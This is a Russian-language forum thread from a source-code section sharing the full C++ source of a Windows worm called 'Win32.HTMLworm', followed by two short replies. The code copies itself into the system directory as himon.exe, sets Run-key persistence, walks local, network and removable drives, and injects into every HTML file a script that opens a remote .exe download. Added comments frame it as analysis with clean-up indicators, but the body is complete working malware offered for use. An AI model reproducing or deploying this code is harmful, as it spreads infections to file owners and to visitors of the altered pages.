
HTMLworm С++

Тема в разделе "Исходные коды", создана пользователем Ant1NooB, 14 май 2012.

  1. TopicStarter Overlay
    Ant1NooB

    Ant1NooB Гость

    Распространяется методом заражения HTML-страниц.
    Код:
    HTML Worm
    // Name: Win32.HTMLworm
    // Author: WarGame
    // Compiler: Borland C++
    // Description: This worm spreads by adding a link to itself in html files
    // Improvements: You could add a link to a page containing an IE exploits :)
    
    #include <windows.h>
    #include <string>
    using namespace std; // :)
    
    // HTMLSpread: rewrites a single HTML file in place.
    // Analysis notes (what the code below visibly does):
    //   - opens the file for read/write and reads its whole content into memory;
    //   - leaves the file untouched if it already contains the marker comment
    //     "<!-- HTMLworm by [WarGame,#eof] !-->";
    //   - otherwise replaces the first "</body>" (or, failing that, "</BODY>")
    //     with a <script> block that calls window.open() on a remote .exe URL,
    //     followed by "</body>";
    //   - writes the modified content back from offset 0 and then writes the
    //     marker comment directly after it.
    // Detection / clean-up indicators taken from this function: the marker
    // comment string, and a javascript window.open() block placed immediately
    // before the closing body tag.
    // Parameter: htmlfile - path of the file to process.
    void HTMLSpread(char *htmlfile)
    {
    HANDLE html_fd;
    DWORD html_filesize,read_bytes,written_bytes;
    char *c_htmlcode = NULL;
    string *htmlcode = NULL; // make it simpler
    long pos;
    
    // open the existing file for read and write (OPEN_EXISTING: never creates files)
    html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
    FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    
    // files that cannot be opened with write access are skipped silently
    if(html_fd == INVALID_HANDLE_VALUE)
    {
    return;
    }
    
    // get file size (only the low 32 bits are requested)
    html_filesize = GetFileSize(html_fd,NULL);
    
    // allocate a buffer of exactly the file size
    c_htmlcode = (char *)malloc(html_filesize);
    
    if(c_htmlcode == NULL)
    {
    return;
    }
    
    // read entire file
    if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
    {
    CloseHandle(html_fd);
    return;
    }
    
    // create a string object
    // NOTE(review): the buffer is handed to the string constructor as a C string
    // without an explicit terminator, so the in-memory copy is not guaranteed to
    // match the file byte for byte. For incident response, treat rewritten files
    // as possibly damaged and prefer restoring from backup over only stripping
    // the injected block.
    htmlcode = new string(c_htmlcode);
    free(c_htmlcode);
    
    // only files that do not yet contain the marker comment are modified
    if(htmlcode->find("<!-- HTMLworm by [WarGame,#eof] !-->") == string::npos)
    {
    
    // locate the closing body tag; only the exact spellings "</body>" and
    // "</BODY>" are searched for
    pos = htmlcode->find("</body>");
    
    if(pos == string::npos)
    {
    pos = htmlcode->find("</BODY>");
    
    // no closing body tag in either spelling: file is left unchanged
    if(pos == string::npos)
    {
    CloseHandle(html_fd);
    delete htmlcode;
    return;
    }
    }
    
    // replace the 7-character closing tag with the script block plus "</body>"
    htmlcode->replace(pos,7,"\r\n<script language=\"javascript\">window.open('http://hexter.host.sk/artwork.exe')</script>\r\n</body>");
    
    // write the modified content back starting at offset 0
    SetFilePointer(html_fd,0,0,FILE_BEGIN);
    WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
    // marker comment (36 bytes) written directly after the rewritten content;
    // its presence is what the check above looks for on later passes
    WriteFile(html_fd,"<!-- HTMLworm by [WarGame,#eof] !-->",36,&written_bytes,NULL);
    
    }
    
    // close all
    CloseHandle(html_fd);
    delete htmlcode;
    
    }
    
    // AutoStart: registers my_path under the Windows "Run" autostart key.
    // Analysis notes: the same value name, "himon", is written under both
    // HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER at
    // Software\Microsoft\Windows\CurrentVersion\Run. Each hive is attempted
    // independently, so either or both entries may be present on an affected
    // host; check and remove the "himon" value in both places during clean-up.
    // Parameter: my_path - path string stored as the REG_SZ value data.
    void AutoStart(char *my_path)
    {
    HKEY hkey;
    
    // machine-wide Run key; the write only happens if the key opens with KEY_WRITE
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
    KEY_WRITE,&hkey)==ERROR_SUCCESS)
    {
    RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
    RegCloseKey(hkey);
    }
    
    // per-user Run key, attempted regardless of the result above
    if(RegOpenKeyEx(HKEY_CURRENT_USER,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
    KEY_WRITE,&hkey)==ERROR_SUCCESS)
    {
    RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
    RegCloseKey(hkey);
    }
    }
    
    // S3arch: recursive directory walk that hands matching files to HTMLSpread.
    // Analysis notes:
    //   - every sub-directory except "." and ".." is descended into;
    //   - a file is selected when its name contains ".html" or ".htm" anywhere
    //     (strstr is a case-sensitive substring test, not an extension check),
    //     so names such as "page.htm.bak" match while "INDEX.HTM" does not.
    //     Keep this in mind when scoping which files to inspect after an
    //     incident.
    // Parameter: pt - directory to scan; a 3-character drive root such as "C:\"
    // is shortened in place to "C:".
    void S3arch(char *pt) {
    char sc[MAX_PATH],buf[MAX_PATH];
    WIN32_FIND_DATA in;
    HANDLE fd,file;
    char *fm = "%s\\%s",*fm1 = "%s\\*.*";
    
    // drop the trailing backslash of a drive root so the format strings below
    // do not produce a doubled separator
    if(strlen(pt) == 3)
    {
    pt[2] = '\0'; /* :-) */
    }
    
    // enumerate everything in the directory ("<pt>\*.*")
    sprintf(sc,fm1,pt);
    fd = FindFirstFile(sc,&in);
    
    do
    {
    
    // full path of the current entry
    sprintf(buf,fm,pt,in.cFileName);
    
    /* real sub-directory (not "." or ".."): recurse */
    if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
    {
    S3arch(buf);
    }
    
    /* File found */
    else
    {
    
    /* name contains ".html" or ".htm": pass the path to HTMLSpread */
    
    if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
    {
    HTMLSpread(buf);
    }
    }
    
    }while(FindNextFile(fd,&in));
    
    FindClose(fd);
    }
    
    
    // WinMain: program entry point.
    // Analysis notes (host indicators visible in this function):
    //   - named mutex "__HTMLworm_by_WarGame_EOF__" used as a single-instance
    //     guard; a second instance exits immediately;
    //   - the running executable is copied to "<system directory>\himon.exe",
    //     overwriting any existing file of that name, and that path is passed to
    //     AutoStart;
    //   - afterwards the process loops forever: drive letters C..Z of type
    //     fixed, remote or removable are scanned via S3arch, then the process
    //     sleeps for 10 minutes before the next pass.
    // Because DRIVE_REMOTE and DRIVE_REMOVABLE are included, mapped network
    // shares and removable media that were attached to an affected host should
    // be included in the scope of any clean-up.
    int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
    // usual shit: installation part, startup and so on ...
    char I_am_here[MAX_PATH],installation_path[MAX_PATH];
    char Drives[3],Drive = 0;
    UINT drive_type;
    
    
    // only one copy: exit if the named mutex already exists
    CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
    ExitProcess(0);
    }
    
    // build "<system directory>\himon.exe"
    GetSystemDirectory(installation_path,MAX_PATH);
    strcat(installation_path,"\\himon.exe");
    
    // path of the currently running executable
    GetModuleFileName(NULL,I_am_here,MAX_PATH);
    // copy it to the installation path (FALSE: an existing file is overwritten)
    CopyFile(I_am_here,installation_path,FALSE);
    AutoStart(installation_path);
    
    
    // the real part starts here
    while(1)
    {
    
    /* Search for drives */
    for(Drive = 'C';Drive <= 'Z';Drive++)
    {
    // root path of the form "X:\"
    Drives[0] = Drive;
    Drives[1] = ':';
    Drives[2] = '\\';
    Drives[3] = '\0';
    
    /* drive ? */
    drive_type = GetDriveType(Drives);
    
    /* only fixed, remote and removable drives */
    if(drive_type == DRIVE_FIXED ||
    drive_type == DRIVE_REMOTE ||
    drive_type == DRIVE_REMOVABLE)
    {
    /* GO! */
    S3arch(Drives);
    }
    }
    
    /* every 10 minutes */
    Sleep((1000*60)*10);
    }
    }
    
     
  2. Destroy

    Destroy

    Регистрация:
    15 май 2012
    Сообщения:
    327
    Симпатии:
    97
    какой принцип вируса?
     
  3. TopicStarter Overlay
    destroycrash

    destroycrash Гость

    Актуально?
     
